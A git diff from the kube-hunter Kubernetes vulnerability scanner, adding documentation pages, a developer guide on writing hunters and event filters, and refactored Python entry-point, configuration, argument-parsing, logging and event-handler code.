<!--[if lt IE 9]>
<script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
<![endif]-->
</head>
<body>
<div class="wrapper">
<header>
<h1><a href="{{ "/" | absolute_url }}">
{% if site.logo %}
<img src="{{site.logo | relative_url}}" alt="Logo" />
{% else %}
{{ site.title | default: site.github.repository_name }}
{% endif %}
</a></h1>
<p>{{ site.description | default: site.github.project_tagline }}</p>
{% if site.github.is_project_page %}
<p class="view"><a href="{{ site.github.repository_url }}">View the Project on GitHub <small>{{ site.github.repository_nwo }}</small></a></p>
{% endif %}
{% if site.github.is_user_page %}
<p class="view"><a href="{{ site.github.owner_url }}">View My GitHub Profile</a></p>
{% endif %}
{% if site.show_downloads %}
<ul class="downloads">
<li><a href="{{ site.github.zip_url }}">Download <strong>ZIP File</strong></a></li>
<li><a href="{{ site.github.tar_url }}">Download <strong>TAR Ball</strong></a></li>
<li><a href="{{ site.github.repository_url }}">View On <strong>GitHub</strong></a></li>
</ul>
{% endif %}
<div>
<div>
Lookup Vulnerability<br />
<input type="text" id="searchInput" placeholder="Vulnerability ID">
<button id="searchButton" class="searchButton">Find</button>
</div>
<div>
<a href="{{ site.baseurl }}{% link kbindex.html %}">All vulnerabilies</a>
</div>
</div>
</header>
<section>
{{ content }}
</section>
<footer>
{% if site.github.is_project_page %}
<p>This project is maintained by <a href="{{ site.github.owner_url }}">{{ site.github.owner_name }}</a></p>
{% endif %}
<p><small>Hosted on GitHub Pages &mdash; Theme by <a href="https://github.com/orderedlist">orderedlist</a></small></p>
</footer>
</div>
<script src="{{ "/assets/js/scale.fix.js" | relative_url }}"></script>
<script type="text/javascript">
var articleUrlTemplate = "{{ site.baseurl }}{% link _kb/KHV002.md %}";
var searchInput = document.getElementById("searchInput");
var searchButton = document.getElementById("searchButton");
searchInput.addEventListener("keyup", function(event) {
if (event.keyCode === 13) {
event.preventDefault();
doSearch();
}
});
searchButton.addEventListener("click", function(event) {
event.preventDefault();
doSearch();
});
function doSearch() {
var searchTerm = searchInput.value;
searchTerm = searchTerm.toUpperCase();
if (!searchTerm.startsWith("KHV")) {
searchTerm = "KHV" + searchTerm;
}
window.location = articleUrlTemplate.replace("KHV002",searchTerm);
}
</script>
{% if site.google_analytics %}
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', '{{ site.google_analytics }}', 'auto');
ga('send', 'pageview');
</script>
{% endif %}
</body>
</html>

122
docs/index.md Normal file
View File

@@ -0,0 +1,122 @@
---
---
# Welcome to kube-hunter documentation
## Documentation for vulnerabilities
For information about a specific vulnerability reported by kube-hunter, enter its 'VID' (e.g. KHV004) in the search box to the left, to get to the vulnerability article.
For a complete list of all documented vulnerabilities, [click here]({{ site.baseurl }}{% link kbindex.html %})
## Getting started
### Where should I run kube-hunter?
Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This will give you an attackers-eye-view of your Kubernetes setup.
You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).
### Scanning options
By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
1. **Remote scanning**
To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
`./kube-hunter.py --remote some.node.com`
2. **interface scanning**
To specify interface scanning, you can use the `--interface` option. (this will scan all of the machine's network interfaces) Example:
`./kube-hunter.py --interface`
3. **Network scanning**
To specify a specific CIDR to scan, use the `--cidr` option. Example:
`./kube-hunter.py --cidr 192.168.0.0/24`
### Active Hunting
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities.
The main difference between normal and active hunting is that a normal hunt will never change state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
By default, kube-hunter does not do active hunting. To active hunt a cluster, use the `--active` flag. Example:
`./kube-hunter.py --remote some.domain.com --active`
### List of tests
You can see the list of tests with the `--list` option: Example:
`./kube-hunter.py --list`
To see active hunting tests as well as passive:
`./kube-hunter.py --list --active`
### Nodes Mapping
To see only a mapping of your nodes network, run with `--mapping` option. Example:
`./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
This will output all the Kubernetes nodes kube-hunter has found.
### Output
To control logging, you can specify a log level, using the `--log` option. Example:
`./kube-hunter.py --active --log WARNING`
Available log levels are:
* DEBUG
* INFO (default)
* WARNING
### Dispatching
By default, the report will be dispatched to `stdout`, but you can specify different methods, by using the `--dispatch` option. Example:
`./kube-hunter.py --report json --dispatch http`
Available dispatch methods are:
* stdout (default)
* http (to configure, set the following environment variables:)
* KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
* KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
## Deployment
There are three methods for deploying kube-hunter:
### On Machine
You can run the kube-hunter python code directly on your machine.
#### Prerequisites
You will need the following installed:
* python 3.x
* pip
Clone the repository:
~~~
git clone https://github.com/aquasecurity/kube-hunter.git
~~~
Install module dependencies:
~~~
cd ./kube-hunter
pip install -r requirements.txt
~~~
Run:
`./kube-hunter.py`
_If you want to use pyinstaller/py2exe you need to first run the install_imports.py script._
### Container
Aqua Security maintains a containerised version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
`docker run -it --rm --network host aquasec/kube-hunter`
_Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.
`docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24`
### Pod
This option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
The `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
* Run the job with `kubectl create` with that yaml file.
* Find the pod name with `kubectl describe job kube-hunter`
* View the test results with `kubectl logs <pod name>`

13
docs/kbindex.html Normal file
View File

@@ -0,0 +1,13 @@
---
---
<h1>All articles</h1>
<ul>
{% for article in site.kb %}
<li>
<h3>
<a href="{{ article.url | prepend: site.baseurl }}">{{ article.vid }} - {{ article.title | escape }}</a>
</h3>
</li>
{% endfor %}
</ul>

View File

@@ -8,7 +8,7 @@ spec:
containers:
- name: kube-hunter
image: aquasec/kube-hunter
command: ["python", "kube-hunter.py"]
command: ["kube-hunter"]
args: ["--pod"]
restartPolicy: Never
backoffLimit: 4

Binary file not shown.

Before

Width:  |  Height:  |  Size: 144 KiB

After

Width:  |  Height:  |  Size: 230 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 19 KiB

View File

@@ -1,164 +0,0 @@
#!/usr/bin/env python
from __future__ import print_function
import argparse
import logging
import threading
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
parser = argparse.ArgumentParser(description='Kube-Hunter - hunts for security weaknesses in Kubernetes clusters')
parser.add_argument('--list', action="store_true", help="displays all tests in kubehunter (add --active flag to see active tests)")
parser.add_argument('--internal', action="store_true", help="set hunting of all internal network interfaces")
parser.add_argument('--pod', action="store_true", help="set hunter as an insider pod")
parser.add_argument('--quick', action="store_true", help="Prefer quick scan (subnet 24)")
parser.add_argument('--cidr', type=str, help="set an ip range to scan, example: 192.168.0.0/16")
parser.add_argument('--mapping', action="store_true", help="outputs only a mapping of the cluster's nodes")
parser.add_argument('--remote', nargs='+', metavar="HOST", default=list(), help="one or more remote ip/dns to hunt")
parser.add_argument('--active', action="store_true", help="enables active hunting")
parser.add_argument('--log', type=str, metavar="LOGLEVEL", default='INFO', help="set log level, options are: debug, info, warn, none")
parser.add_argument('--report', type=str, default='plain', help="set report type, options are: plain, yaml, json")
import plugins
config = parser.parse_args()
try:
loglevel = getattr(logging, config.log.upper())
except:
pass
if config.log.lower() != "none":
logging.basicConfig(level=loglevel, format='%(message)s', datefmt='%H:%M:%S')
from src.modules.report.plain import PlainReporter
from src.modules.report.yaml import YAMLReporter
from src.modules.report.json_reporter import JSONReporter
if config.report.lower() == "yaml":
config.reporter = YAMLReporter()
elif config.report.lower() == "json":
config.reporter = JSONReporter()
else:
config.reporter = PlainReporter()
from src.core.events import handler
from src.core.events.types import HuntFinished, HuntStarted
from src.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
from src.modules.hunting.kubelet import Kubelet
from src.modules.discovery.apiserver import ApiServerDiscovery
from src.modules.discovery.proxy import KubeProxy
from src.modules.discovery.etcd import EtcdRemoteAccess
from src.modules.discovery.dashboard import KubeDashboard
from src.modules.discovery.ports import PortDiscovery
from src.modules.hunting.apiserver import AccessApiServer
from src.modules.hunting.apiserver import AccessApiServerWithToken
from src.modules.hunting.proxy import KubeProxy
from src.modules.hunting.etcd import EtcdRemoteAccess
from src.modules.hunting.certificates import CertificateDiscovery
from src.modules.hunting.dashboard import KubeDashboard
from src.modules.hunting.cvehunter import IsVulnerableToCVEAttack
from src.modules.hunting.aks import AzureSpnHunter
from src.modules.hunting.secrets import AccessSecrets
import src
def interactive_set_config():
"""Sets config manually, returns True for success"""
options = [("Remote scanning", "scans one or more specific IPs or DNS names"),
("Subnet scanning","scans subnets on all local network interfaces"),
("IP range scanning","scans a given IP range")]
print("Choose one of the options below:")
for i, (option, explanation) in enumerate(options):
print("{}. {} ({})".format(i+1, option.ljust(20), explanation))
choice = raw_input("Your choice: ")
if choice == '1':
config.remote = raw_input("Remotes (separated by a ','): ").replace(' ', '').split(',')
elif choice == '2':
config.internal = True
elif choice == '3':
config.cidr = raw_input("CIDR (example - 192.168.1.0/24): ").replace(' ', '')
else:
return False
return True
def parse_docs(hunter, docs):
"""returns tuple of (name, docs)"""
if not docs:
return hunter.__name__, "<no documentation>"
docs = docs.strip().split('\n')
for i, line in enumerate(docs):
docs[i] = line.strip()
return docs[0], ' '.join(docs[1:]) if len(docs[1:]) else "<no documentation>"
def list_hunters():
print("\nPassive Hunters:\n----------------")
for i, (hunter, docs) in enumerate(handler.passive_hunters.items()):
name, docs = parse_docs(hunter, docs)
print("* {}\n {}\n".format(name, docs))
if config.active:
print("\n\nActive Hunters:\n---------------")
for i, (hunter, docs) in enumerate(handler.active_hunters.items()):
name, docs = parse_docs(hunter, docs)
print("* {}\n {}\n".format( name, docs))
global hunt_started_lock
hunt_started_lock = threading.Lock()
hunt_started = False
def main():
global hunt_started
scan_options = [
config.pod,
config.cidr,
config.remote,
config.internal
]
try:
if config.list:
list_hunters()
return
if not any(scan_options):
if not interactive_set_config(): return
hunt_started_lock.acquire()
hunt_started = True
hunt_started_lock.release()
handler.publish_event(HuntStarted())
if config.pod:
handler.publish_event(RunningAsPodEvent())
else:
handler.publish_event(HostScanEvent())
# Blocking to see discovery output
handler.join()
except KeyboardInterrupt:
logging.debug("Kube-Hunter stopped by user")
# happens when running a container without interactive option
except EOFError:
logging.error("\033[0;31mPlease run again with -it\033[0m")
finally:
hunt_started_lock.acquire()
if hunt_started:
hunt_started_lock.release()
handler.publish_event(HuntFinished())
handler.join()
handler.free()
logging.debug("Cleaned Queue")
else:
hunt_started_lock.release()
if __name__ == '__main__':
main()

1
kube-hunter.py Symbolic link
View File

@@ -0,0 +1 @@
kube_hunter/__main__.py

View File

@@ -1,13 +1,11 @@
# Guidelines for developing kube-hunter
---
This document is intended for developers, if you are not a developer, please refer back to the [Deployment README](/README.md)
First, lets go through kube-hunter's basic architecture.
First, let's go through kube-hunter's basic architecture.
### Directory Structure
~~~
kube-hunter/
plugins/
# your plugin
src/
kube_hunter/
core/
modules/
discovery/
@@ -16,23 +14,23 @@ kube-hunter/
# your module
report/
# your module
kube-hunter.py
__main__.py
~~~
### Design Pattern
Kube-hunter is built with the [Observer Pattern](https://en.wikipedia.org/wiki/Observer_pattern).
With this in mind, every new Service/Vulnerability/Information that has been discovered, will trigger a new event.
With this in mind, every new Service/Vulnerability/Information that has been discovered will trigger a new event.
When you write your module, you can decide on which Event to subscribe to, meaning, when exactly will your module start Hunting.
-----------------------
### Hunter Types
There are two hunter types which you can implement: a `Hunter` and an `ActiveHunter`. Hunters just probe the state of a cluster, whereas ActiveHunter modules can attempt operations that could change the state of the cluster.
There are three hunter types which you can implement: a `Hunter`, `ActiveHunter` and `Discovery`. Hunters just probe the state of a cluster, whereas ActiveHunter modules can attempt operations that could change the state of the cluster. Discovery is Hunter for discovery purposes only.
##### Hunter
Example:
~~~python
@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 30000)
class KubeDashboardDiscovery(Hunter):
"""Dashboard Discovery
Explanation about what the hunter does
Explanation about what the Hunter does
"""
def __init__(self, event):
self.event = event
@@ -40,8 +38,8 @@ class KubeDashboardDiscovery(Hunter):
pass
~~~
Kube-hunter's core module triggers your Hunter when the event you have subscribed it to occurs.
in this example, we subscribe the Hunter, `KubeDashboardDiscovery`, to an `OpenPortEvent`, with a predicate that checks the open port (of the event) is 30000.
`Convention:` The first line of the comment describing the hunter is the visible name, the other lines are the explanation.
In this example, we subscribe the Hunter, `KubeDashboardDiscovery`, to an `OpenPortEvent`, with a predicate that checks the open port (of the event) is 30000.
`Convention:` The first line of the comment describing the Hunter is the visible name, the other lines are the explanation.
##### ActiveHunter
@@ -56,9 +54,9 @@ class ProveSomeVulnerability(ActiveHunter):
* Every hunter, needs to implement an `execute` method. the core module will execute this method automatically.
* Every hunter, needs to save its given event from the `__init__` in it's attributes.
* When subscribing to an event, if a `predicate` is specified, it will be called with the event itself, pre trigger.
* When subscribing to an event, if a `predicate` is specified, it will be called with the event itself, pre-trigger.
* When inheriting from `Hunter` or `ActiveHunter` you can use the `self.publish_event(event)`.
`event` is an **initialized** event object
`event` is an **initialized** event object.
-----------------------
@@ -66,21 +64,21 @@ class ProveSomeVulnerability(ActiveHunter):
The first step is to create a new file in the `hunting` or the `discovery` folder.
_The file's (module's) content is imported automatically"_
`Convention:` Hunters which discover a new service should be placed under the `discovery` folder.
`Convention:` Hunters which discover a new vulnerability, should be placed under the `hunting` folder.
`Convention:` Hunters which use vulnerabilities, should be placed under the `hunting` folder and should implement the ActiveHunter base class.
`Convention:` Hunters which discover a new vulnerability should be placed under the `hunting` folder.
`Convention:` Hunters which use vulnerabilities should be placed under the `hunting` folder and should implement the ActiveHunter base class.
The second step is to determine what events your Hunter will subscribe to, and from where you can get them.
`Convention:` Events should be declared in their corresponding module. for example, a KubeDashboardEvent event is declared in the dashboard discovery module.
`Convention:` Events should be declared in their corresponding module. For example, a KubeDashboardEvent event is declared in the dashboard discovery module.
`Note:` An hunter located under the `discovery` folder should not import any modules located under the `hunting` folder
`Note:` A Hunter located under the `discovery` folder should not import any modules located under the `hunting` folder
in order to prevent circular dependency bug.
Following the above example, let's figure out the imports:
```python
from ...core.types import Hunter
from ...core.events import handler
from kube_hunter.core.types import Hunter
from kube_hunter.core.events import handler
from ...core.events.types import OpenPortEvent
from kube_hunter.core.events.types import OpenPortEvent
@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 30000)
class KubeDashboardDiscovery(Hunter):
@@ -92,13 +90,13 @@ class KubeDashboardDiscovery(Hunter):
As you can see, all of the types here come from the `core` module.
### Core Imports
relative import: `...core.events`
Absolute import: `kube_hunter.core.events`
|Name|Description|
|---|---|
|handler|Core object for using events, every module should import this object|
relative import `...core.events.types`
Absolute import `kube_hunter.core.events.types`
|Name|Description|
|---|---|
@@ -106,7 +104,7 @@ relative import `...core.events.types`
|Vulnerability|Base class for defining a new vulnerability|
|OpenPortEvent|Published when a new port is discovered. open port is assigned to the `port ` attribute|
relative import: `...core.types`
Absolute import: `kube_hunter.core.types`
|Type|Description|
|---|---|
@@ -118,7 +116,7 @@ relative import: `...core.types`
## Creating Events
As discussed above, we know there are a lot of different types of events that can be created. but at the end, they all need to inherit from the base class `Event`
lets see some examples of creating different types of events:
Let's see some examples of creating different types of events:
### Vulnerability
```python
class ExposedMasterCN(Vulnerability, Event):
@@ -133,10 +131,10 @@ class ExposedMasterCN(Vulnerability, Event):
class OpenKubeDns(Service, Event):
"""Explanation about this Service"""
def __init__(self):
Service.__init__(self, name="Kube-Dns")
Service.__init__(self, name="Kube-DNS")
```
`Notice:` Every type of event, should have an explanation in exactly the form shown above, that explanation will eventually be used when the report is made.
`Notice:` You can add any attribute to the event you create as needed, the examples shown above is the minimum implementation that needs to be made
`Notice:` Every type of event should have an explanation in exactly the form shown above (that explanation will eventually be used when the report is made).
`Notice:` You can add any attribute to the event you create as needed. The examples shown above are the minimum implementation that needs to be made.
-----------------------
## Events
@@ -149,7 +147,7 @@ Example for an event chain:
*The first node of every event tree is the NewHostEvent*
Let us assume the following imaginary example:
We've defined a Hunter for SSL Certificates, which extracts the CN of the certificate, and does some magic with it. The example code would be defined in new `discovery` and `hunter` modules for this SSL Magic example:
We've defined a Hunter for SSL Certificates, which extracts the CN of the certificate and does some magic with it. The example code would be defined in new `discovery` and `hunter` modules for this SSL Magic example:
Discovery:
```python
@@ -173,8 +171,7 @@ class SslHunter(Hunter):
def execute(self):
do_magic(self.event.certificate)
```
Let's say we now want to do something with the hostname from the certificate from. In the event tree, we can check if the host attribute was assigned to our event previously, by directly accessing `event.host`. If it has not been specified from some reason, the value is `None`.
So this is sufficient for our example:
Let's say we now want to do something with the hostname from the certificate. In the event tree, we can check if the host attribute was assigned to our event previously, by directly accessing `event.host`. If it has not been specified for some reason, the value is `None`. So this is sufficient for our example:
```python
...
def execute(self):
@@ -182,16 +179,71 @@ def execute(self):
do_something_with_host(self.event.host) # normal access
```
If another Hunter subscribes to the events that this Hunter publishes, if can access the `event.certificate`.
If another Hunter subscribes to the events that this Hunter publishes, it can access the `event.certificate`.
## Proving Vulnerabilities
The process of proving vulnerabilities, is the base concept of the Active Hunting.
The process of proving vulnerabilities is the base concept of Active Hunting.
To prove a vulnerability, create an `ActiveHunter` that is subscribed to the vulnerability, and inside of the `execute`, specify the `evidence` attribute of the event.
*Note that you can specify the 'evidence' attribute without active hunting*
## Filtering Events
A filter can change an event's attribute or remove it completely before it gets published to Hunters.
To create a filter:
* create a class that inherits from `EventFilterBase` (from `kube_hunter.core.events.types`)
* use `@handler.subscribe(Event)` to filter a specific `Event`
* define a `__init__(self, event)` method, and save the event in your class
* implement `self.execute(self)` method, __returns a new event, or None to remove event__
_(You can filter a parent event class, such as Service or Vulnerability, to filter all services/vulnerabilities)_
#### Options for filtering:
* Remove/Prevent an event from being published
* Altering event attributes
To prevent an event from being published, return `None` from the execute method of your filter.
To alter event attributes, return a new event, based on the `self.event` after your modifications, it will replace the event itself before it is published.
__Make sure to return the event from the execute method, or the event will not get published__
For example, if you don't want to hunt services found on a localhost IP, you can create the following module, in the `kube_hunter/modules/report/`
```python
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Service, EventFilterBase
@handler.subscribe(Service)
class LocalHostFilter(EventFilterBase):
# return None to filter out event
def execute(self):
if self.event.host == "127.0.0.1":
return None
return self.event
```
The following filter will filter out any Service found on a localhost IP. Those Services will not get published to Kube-Hunter's Queue.
That means other Hunters that are subscribed to this Service will not get triggered.
That opens up a wide variety of possible operations, as this not only can __filter out__ events, but you can actually __change event attributes__, for example:
```python
from kube_hunter.core.events import handler
from kube_hunter.core.types import InformationDisclosure
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
@handler.subscribe(Vulnerability)
class CensorInformation(EventFilterBase):
# return None to filter out event
def execute(self):
if self.event.category == InformationDisclosure:
new_event = self.event
new_event.evidence = "<classified information>"
return new_event
else:
return self.event
```
This will censor all vulnerabilities which can disclose information about a cluster.
__Note: In filters, you should not change attributes in the event.previous. This will result in unexpected behaviour__.
## Tests
Although we haven't been rigorous about this in the past, please add tests to support your code changes. Tests are executed like this:
```bash
python runtest.py
pytest
```

0
kube_hunter/__init__.py Normal file
View File

129
kube_hunter/__main__.py Executable file
View File

@@ -0,0 +1,129 @@
#!/usr/bin/env python3
# flake8: noqa: E402
import logging
import threading
from kube_hunter.conf import Config, set_config
from kube_hunter.conf.parser import parse_args
from kube_hunter.conf.logging import setup_logger
from kube_hunter.plugins import initialize_plugin_manager
pm = initialize_plugin_manager()
# Using a plugin hook for adding arguments before parsing
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
config = Config(
active=args.active,
cidr=args.cidr,
include_patched_versions=args.include_patched_versions,
interface=args.interface,
log_file=args.log_file,
mapping=args.mapping,
network_timeout=args.network_timeout,
pod=args.pod,
quick=args.quick,
remote=args.remote,
statistics=args.statistics,
)
setup_logger(args.log, args.log_file)
set_config(config)
# Running all other registered plugins before execution
pm.hook.load_plugin(args=args)
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import HuntFinished, HuntStarted
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
from kube_hunter.modules.report import get_reporter, get_dispatcher
logger = logging.getLogger(__name__)
config.dispatcher = get_dispatcher(args.dispatch)
config.reporter = get_reporter(args.report)
def interactive_set_config():
"""Sets config manually, returns True for success"""
options = [
("Remote scanning", "scans one or more specific IPs or DNS names"),
("Interface scanning", "scans subnets on all local network interfaces"),
("IP range scanning", "scans a given IP range"),
]
print("Choose one of the options below:")
for i, (option, explanation) in enumerate(options):
print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
choice = input("Your choice: ")
if choice == "1":
config.remote = input("Remotes (separated by a ','): ").replace(" ", "").split(",")
elif choice == "2":
config.interface = True
elif choice == "3":
config.cidr = (
input("CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): ")
.replace(" ", "")
.split(",")
)
else:
return False
return True
def list_hunters():
print("\nPassive Hunters:\n----------------")
for hunter, docs in handler.passive_hunters.items():
name, doc = hunter.parse_docs(docs)
print(f"* {name}\n {doc}\n")
if config.active:
print("\n\nActive Hunters:\n---------------")
for hunter, docs in handler.active_hunters.items():
name, doc = hunter.parse_docs(docs)
print(f"* {name}\n {doc}\n")
hunt_started_lock = threading.Lock()
hunt_started = False
def main():
global hunt_started
scan_options = [config.pod, config.cidr, config.remote, config.interface]
try:
if args.list:
list_hunters()
return
if not any(scan_options):
if not interactive_set_config():
return
with hunt_started_lock:
hunt_started = True
handler.publish_event(HuntStarted())
if config.pod:
handler.publish_event(RunningAsPodEvent())
else:
handler.publish_event(HostScanEvent())
# Blocking to see discovery output
handler.join()
except KeyboardInterrupt:
logger.debug("Kube-Hunter stopped by user")
# happens when running a container without interactive option
except EOFError:
logger.error("\033[0;31mPlease run again with -it\033[0m")
finally:
hunt_started_lock.acquire()
if hunt_started:
hunt_started_lock.release()
handler.publish_event(HuntFinished())
handler.join()
handler.free()
logger.debug("Cleaned Queue")
else:
hunt_started_lock.release()
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,52 @@
from dataclasses import dataclass
from typing import Any, Optional
@dataclass
class Config:
"""Config is a configuration container.
It contains the following fields:
- active: Enable active hunters
- cidr: Network subnets to scan
- dispatcher: Dispatcher object
- include_patched_version: Include patches in version comparison
- interface: Interface scanning mode
- list_hunters: Print a list of existing hunters
- log_level: Log level
- log_file: Log File path
- mapping: Report only found components
- network_timeout: Timeout for network operations
- pod: From pod scanning mode
- quick: Quick scanning mode
- remote: Hosts to scan
- report: Output format
- statistics: Include hunters statistics
"""
active: bool = False
cidr: Optional[str] = None
dispatcher: Optional[Any] = None
include_patched_versions: bool = False
interface: bool = False
log_file: Optional[str] = None
mapping: bool = False
network_timeout: float = 5.0
pod: bool = False
quick: bool = False
remote: Optional[str] = None
reporter: Optional[Any] = None
statistics: bool = False
_config: Optional[Config] = None
def get_config() -> Config:
if not _config:
raise ValueError("Configuration is not initialized")
return _config
def set_config(new_config: Config) -> None:
global _config
_config = new_config

View File

@@ -0,0 +1,29 @@
import logging
DEFAULT_LEVEL = logging.INFO
DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
# Suppress logging from scapy
logging.getLogger("scapy.runtime").setLevel(logging.CRITICAL)
logging.getLogger("scapy.loading").setLevel(logging.CRITICAL)
def setup_logger(level_name, logfile):
# Remove any existing handlers
# Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
for h in logging.getLogger().handlers[:]:
h.close()
logging.getLogger().removeHandler(h)
if level_name.upper() == "NONE":
logging.disable(logging.CRITICAL)
else:
log_level = getattr(logging, level_name.upper(), None)
log_level = log_level if isinstance(log_level, int) else None
if logfile is None:
logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
else:
logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
if not log_level:
logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")

101
kube_hunter/conf/parser.py Normal file
View File

@@ -0,0 +1,101 @@
from argparse import ArgumentParser
from kube_hunter.plugins import hookimpl
@hookimpl
def parser_add_arguments(parser):
"""
This is the default hook implementation for parse_add_argument
Contains initialization for all default arguments
"""
parser.add_argument(
"--list",
action="store_true",
help="Displays all tests in kubehunter (add --active flag to see active tests)",
)
parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
parser.add_argument("--pod", action="store_true", help="Set hunter as an insider pod")
parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
parser.add_argument(
"--include-patched-versions",
action="store_true",
help="Don't skip patched versions when scanning",
)
parser.add_argument(
"--cidr",
type=str,
help="Set an IP range to scan/ignore, example: '192.168.0.0/24,!192.168.0.8/32,!192.168.0.16/32'",
)
parser.add_argument(
"--mapping",
action="store_true",
help="Outputs only a mapping of the cluster's nodes",
)
parser.add_argument(
"--remote",
nargs="+",
metavar="HOST",
default=list(),
help="One or more remote ip/dns to hunt",
)
parser.add_argument("--active", action="store_true", help="Enables active hunting")
parser.add_argument(
"--log",
type=str,
metavar="LOGLEVEL",
default="INFO",
help="Set log level, options are: debug, info, warn, none",
)
parser.add_argument(
"--log-file",
type=str,
default=None,
help="Path to a log file to output all logs to",
)
parser.add_argument(
"--report",
type=str,
default="plain",
help="Set report type, options are: plain, yaml, json",
)
parser.add_argument(
"--dispatch",
type=str,
default="stdout",
help="Where to send the report to, options are: "
"stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and "
"KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)",
)
parser.add_argument("--statistics", action="store_true", help="Show hunting statistics")
parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
def parse_args(add_args_hook):
"""
Function handles all argument parsing
@param add_arguments: hook for adding arguments to it's given ArgumentParser parameter
@return: parsed arguments dict
"""
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
# adding all arguments to the parser
add_args_hook(parser=parser)
args = parser.parse_args()
if args.cidr:
args.cidr = args.cidr.replace(" ", "").split(",")
return args

View File

@@ -1,2 +1,3 @@
# flake8: noqa: E402
from . import types
from . import events

View File

@@ -0,0 +1,3 @@
# flake8: noqa: E402
from .handler import EventQueue, handler
from . import types

View File

@@ -0,0 +1,160 @@
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
def __init__(self, num_worker=10):
super().__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
config = get_config()
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in self.filters[event]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
